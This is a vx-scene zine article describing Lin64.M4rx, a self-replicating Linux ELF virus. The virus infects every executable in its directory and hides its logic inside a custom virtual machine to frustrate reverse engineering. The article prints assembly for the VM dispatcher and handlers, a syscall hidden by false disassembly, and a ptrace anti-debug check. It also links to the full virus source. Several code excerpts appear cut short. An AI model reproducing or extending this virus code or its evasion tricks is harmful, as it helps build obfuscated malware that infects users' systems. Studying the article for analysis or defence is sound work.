___________                              __
                \__    ___/____ ______      ____  __ ___/  |_
                  |    | /     \\____ \    /  _ \|  |  \   __\
                  |    ||  Y Y  \  |_> >  (  <_> )  |  /|  |
                  |____||__|_|  /   __/ /\ \____/|____/ |__|
                              \/|__|    \/

|:::::::|  Lin64.M4rx: How to write a virtual machine in order to      |:::::::|
|:::::::|       hide your viruses and break your brain forever         |:::::::|

With love, by S01den.
mail: S01den@protonmail.com

.---\ Introduction /---.

In this new paper, I'm gonna present you my last virus: Lin64.M4rx, the first
virus I wrote using a VM as a protection against reverse engineering.
Obviously I didn't and I won't spread it into the wild. Don't do that stupid
thing neither.

I implemented some tricks to spice a bit the RE, such as false disassembly in
some parts of the code, and the classic PTRACE_TRACEME technique (but this time,
it won't be as easy as usual to bypass...).

Also, as a rule, Lin64.M4rx is a virus infecting every ELF which is in the same
directory (PIE or not), with PT_NOTE to PT_LOAD injection, check sblip's paper
in tmp0ut #1 for more details [0].

And as usual the payload is stupid as fuck (it just displays "BACA" awesome,
I don't even know why I choose those letters).

So now you're hyped, we'll start to dig into the m4rx's source code.
Follow the white rabbit...

.---\ How to write a Virtual Machine in assembly /---.

At first, I think I should explain what a VM is, to not create confusion.
When talking about binary obfuscation and reverse engineering, a VM is a kind
of binary protection, where the executed code is written with a custom (or not)
instruction set and executed with an emulated CPU.

When looking at a disassembled virtualized code, you can see at first what the
VM is able to do, but not the order in which virtual opcodes are actually

Let's see how I created my own VM with its instruction set.
Before writting any line of code, I drew a schema of how my Virtual Machine would

           +---------- SPIDER ----------+
           | main code                  |            +-- H --+ <== HandlersTable
           |                            |            |___H1__|
           | f: I -> H                  |--- EXEC ---|___H2__|
      -----|    Ii -> Hi                |            |__...__|
      |    | SPIDER = f(VX)             |            |___Hn__|
      |    +----------------------------+
      |                                |         +-- VX --+
+----------------------------------+   |--CHECK--|___I1___|
| I = List of virtual instructions |             |___I2___|
+----------------------------------+             |__...___|


+--- Virtual Stack ---+      +---VirtualRegistersTable ---+
|_________S1__________|      |  R1  |  R2  |  ...  |  Rn  |
|_________..._________|      +----------------------------+
|_________Sn__________|         ^--- R1 = VPC (virtual program counter)

The virus in itself is written with the custom instruction set I defined.
For the sake of simplicity, I chose to give the same size (8 bytes) to all

Let's take an example.
%define MOV_Rx_Ry(x,y) db 0x04,x,y,0x2e,0xc3,0xec,0x92,0xf
This is the set of opcodes corresponding to the instruction MOV_Rx_Ry(x,y),
which is my virtual equivalent of a "mov rX, rY", such as "mov rax, rbx" in x64.

The first byte, 0x04 here, stands for the number attributed to the instruction,
it's what the spider will check in order to jump to the right handler.

x and y are arguments, they are replaced by the number corresponding to virtual
registers when the instruction is called. For example MOV_Rx_Ry(1, 2) will move
the value stored in the second virtual register into the first virtual register.

Here is a schema showing how I organised the virtual registers.
(each reg is made of 8 bytes (qword))

[VSP][r0][...][r(NBR_REG-1)][a0][a1][a2][a3][a4][a5][ret] --+
+----------------------------------------------+            |
| Virtual Context: 8+8*(NBR_REG)+8*6+8 bytes   | <----------+
|          Virtual Stack: 0x600 bytes          |
|         Real Stack: a lot of bytes           |

The last five bytes (0x2e,0xc3,0xec,0x92,0xf) are totally useless, they aren't
used by the handler, that's why I chose random bytes, to confuse reverse
engineers a little more.

Now, let's admit that we have a MOV_Rx_Ry(A1_PARAM, VSP) somewhere in the virus
code. This instruction is designed to put the content of the VSP (equivalent of
RSP for the virtual stack) into A1, a syscall argument register.
How is the VM able to understand this custom instruction and execute it ?

The answer is spider. It's the name of the piece of code I wrote making links
between the virtual instructions and their handlers (the blocks of real code
executing what virtual instructions are designed for).

The code is hopefully not as frightening than an actual spider, it looks like a
big bug with 0x20 legs but it's in fact a paper tiger[1]:

----------------------------------- cut-here -----------------------------------
; not the spider, but I think it's important to keep those registers in mind:
xor rax, rax ; rax will hold the program counter (pc)
xor rbx, rbx ; rbx will be a buffer register
xor rcx, rcx ; rcx will hold the first argument of an instruction
xor rdx, rdx ; rdx will hold the second argument of an instruction
xor rsi, rsi ; rsi will point to the virtual context (list of all virutal regs)
xor rdi, rdi ; rdi will point to the virus code

; now, the spider:
  mov rbx, qword [rdi+rax] ; rbx contains the current virtual opcode

  cmp bl, 0x1 ; NOP1
  je handlers_table.NOP
  cmp bl, 0x2 ; PUSHR
  je handlers_table.PUSH_Reg
  cmp bl, 0x3 ; POP_R
  je handlers_table.POP_Reg
  cmp bl, 0x4 ; MOV_Reg_to_Reg
  je handlers_table.MOV_Reg_to_Reg
  cmp bl, 0x20
  je handlers_table.JMPNEG

    cmp rax, virus_end-code-5
    jl spider


Trivial, as you can see.
Now, the last piece of the puzzle: the handler.
The role of a handler is basically to operate on virtual registers or virtual
stack with real instructions, in order to perform what the virtual instruction
is supposed to do.

Here is the handler corresponding to MOV_Rx_Ry(Rx, Ry)

----------------------------------- cut-here -----------------------------------
  ; first we clean the registers
  xor rcx, rcx
  xor rdx, rdx

  mov cl, byte [rdi+rax+1] ; rcx = Rx
  mov dl, byte [rdi+rax+2] ; rdx = Ry

  push rbx
  mov rbx, qword [rsi+rdx*8] ; move to into rbx, the value stored in Rx
  mov qword [rsi+rcx*8], rbx ; move rbx into Ry
  pop rbx

  add rax, 0x8 ; pc += 8 (easy because each instruction is made of 8 bytes)
  jmp spider.cmp_end ; return to spider

To call a syscall, I wrote a special instruction, named SYSCALL(), taking as
argument the number of the syscall.
I specially created some virtual registers, the argument registers, to hold the
syscall's arguments.

----------------------------------- cut-here -----------------------------------
  ; clear registers
  xor rcx, rcx
  xor rdx, rdx
  xor rbx, rbx

  mov bl, byte [rdi+rax+1] ; mov the syscall number in rbx

  ; save everything
  push rax
  push rdi
  push rsi
  push rdx
  push r10
  push r8
  push r9

  mov rdi, qword [rsi+A0] ; a0 = 1st syscall argument
  mov rdx, qword [rsi+A2] ; a2 = 3rd syscall argument
  mov r10, qword [rsi+A3] ; a3 = 4th syscall argument
  mov r8, qword [rsi+A4] ; a4 = 5th syscall argument
  mov r9, qword [rsi+A5] ; a5 = 6th syscall argument
  mov rsi, qword [rsi+A1] ; a1 = 2nd syscall argument

  ; a bit of false disassembly to hide the only syscall instruction in the whole
  ; source code
  jmp .jmp_over3+2
      db `\x80\x87`
  mov rax, rbx ; move the syscall number into rax to perform the syscall
  mov rbx, rsp

  ; restore everything
  mov rsp, rbx
  pop r9
  pop r8
  pop r10
  pop rdx
  pop rsi

  mov qword [rsi+RET_REG], rax ; mov the syscall return value into the return-reg
  pop rdi
  pop rax

  ; go to the next instruction
  add rax, 0x8 ; pc += 8
  jmp spider.cmp_end

.--\ The virtualized virus /--.

Now we have a complete instruction set for our virtual CPU, we can actually use
the VM!
However, the code is pretty long, but not really complicated.
In fact, I took Lin64.Kropotkine[2] as a basis and I translated the code to my
own instruction set; so I won't explain in details the whole source code.

I'm going to explain the lite anti-debug part, which is located at the beginning
of the virus.

----------------------------------- cut-here -----------------------------------

MOV_Rx_Ry(2,RET_REG_PARAM) ; put the return value into reg_2
JMP_NE(0,1,2,A0_PARAM)    ; if ptrace value is != 0, jump to MOV_B(A0_PARAM,123)
JMP_REL(0, 2) ; if ptrace == 0, there is no tracing so we can jump above the exit
MOV_B(A0_PARAM,123)  ; exit(123)

Once you've understood that, you can understand easily almost all the code.

.--\ Conclusion /--.

I hope you enjoyed this paper! This project took me a lot of time, but it was
really fun to write.

Read the source code! It's not really complicated with the explanations I
provided you in this paper (in addition to the sources of Lin64.Kropotkine[2])
and I bet you'll learn a lot!

However if you want to build it and test it, do it inside a VM! The virus is
a bit unstable and could harm your computer. I'm not responsible of that!
Test it at your own risks and don't spread it into the wild, I'm sure you're not
a skiddy.

Maybe it's the first ELF virus using code virtualization, if it's not the case,
don't hesitate to contact me, I'm pretty curious about that.

Greetz to:
sblip, tmz, netspooky, yir/okb, shalltear, qkumba, smelly and all the people
who keep the vx scene alive.

See ya

.--\ Links and references /--.

[0] https://tmpout.sh/1/2.html
[1] https://en.wikipedia.org/wiki/Paper_tiger
[2] https://github.com/vxunderground/MalwareSourceCode/blob/main/VXUG/Linux.Kropotkine.asm